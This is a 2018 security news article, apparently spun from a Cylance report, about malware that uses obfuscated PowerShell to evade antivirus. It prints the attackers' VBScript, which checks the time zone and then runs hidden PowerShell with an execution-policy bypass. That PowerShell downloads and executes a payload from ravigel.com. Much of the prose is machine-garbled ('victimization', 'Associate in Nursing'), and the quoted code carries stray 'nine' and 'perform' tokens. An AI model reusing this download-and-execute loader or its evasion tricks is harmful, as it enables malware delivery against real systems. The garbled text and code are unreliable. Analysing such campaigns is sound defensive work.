Hackers Spreading New Malware with Powerful Obfuscation Technique to Bypass Antivirus computer code

Researchers discovered new malware sample that's victimization completely different obfustication technique to alter the signature once its delivery the ultimate payload to evade the foremost of the anti-virus merchandise.

Attackers ever-changing the obfustication technique from customizing the ultimate payload to customize the delivery methodology that is an efficient methodology to achieve the target with success while not being wedged by Antivirus scan.

Since several of the Antivirus merchandise area units think about the signature-based detection, attackers keep ever-changing the structure of the malware while not alter its performance and making a layer to evade the antivirus detection.

The following methodology is usually used obfuscation technique to treat Actors to evade the antivirus detection.

Packers, that compressor “pack” a malware program

Crypters, that encode a malware program (or parts thereof)

Other obfuscators, that change – however don't neuter – the malware program in a very sort of ways that, therefore ever-changing the variety of bytes within the program

How will this Malware Works

Researchers encounter new malware file that employing a PowerShell obfuscation technique that is distributed via nothing file that holds VBS Script and  PDF Document.

VBscript victimization Base64 encryption principals to change the primary layer then the VBscript can transfer the file “hxxps://ravigel[dot]com/1cr[dot]dat” via PowerShell Script.

Function GetTimeZoneOffset()
Const sComputer = “.”

Dim oWmiService : Set oWmiService = nine
GetObject(“winmgmts:!\\” nine
& sComputer & “\root\cimv2”)

Dim cTimeZone : Set cTimeZone = nine
oWmiService.ExecQuery(“Select * from Win32_TimeZone”)

Dim oTimeZone
For Each oTimeZone in cTimeZone
GetTimeZoneOffset = oTimeZone.Bias / 60
Exit For
End perform

Set vertu = CreateObject(“WScript.Shell”)


if GetTimeZoneOffset = nine then

Dim humm
okol=”ss -c”
mur=”le hid”
vertu.Run(tss1+vk2+nop3+” -windowsty”+mur+”den -noexit -executionpolicy bypa”+okol+”ommand I`EX ((neW`-Obj`EcT ((‘Net’+’.’+’Webc’+’lient’))).((‘Downloadst’+’ri’+’ng’)).InVokE(((‘ht”+”tp:’+’/”+”/r’+’av’+’ig’+’el.com/1’+’cr.’+’da’+’t’)))) “)
Set vertu = Nothing
end if

According to cylance, varied techniques, like string rending through concatenation and variable assignment, similarly because the use of tick marks “`” and random letter capitalizations, area unit wont to go different ways words or signatures that antivirus firms ordinarily depend on for malicious PowerShell identification.

The researchers aforementioned, “The file 1cr.dat is wherever things got fascinating,”  “It uses a technique of string coding inherent in C# referred to as SecureString…commonly wont to encode sensitive strings among applications victimization Microsoft’s inherent DPAPI.”

Later a group of directions is there to aim to defeat machine-controlled sandbox techniques Associate in Nursing another letter file “top.tab” are downloaded victimization the prevailing script and final payload can inject into the victim’s machine.

During the analysis, the file was solely detected by 3 merchandise.

The payload may be a straightforward spying tool wide far-famed to the protection community. it's thought of trade goods malware Researchers aforementioned.

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Hackers Spreading New Malware with Powerful Obfuscation Technique to Bypass Antivirus computer code Hackers Spreading New Malware with Powerful Obfuscation Technique to Bypass Antivirus computer code Reviewed by Samy on September 18, 2018 Rating: 5

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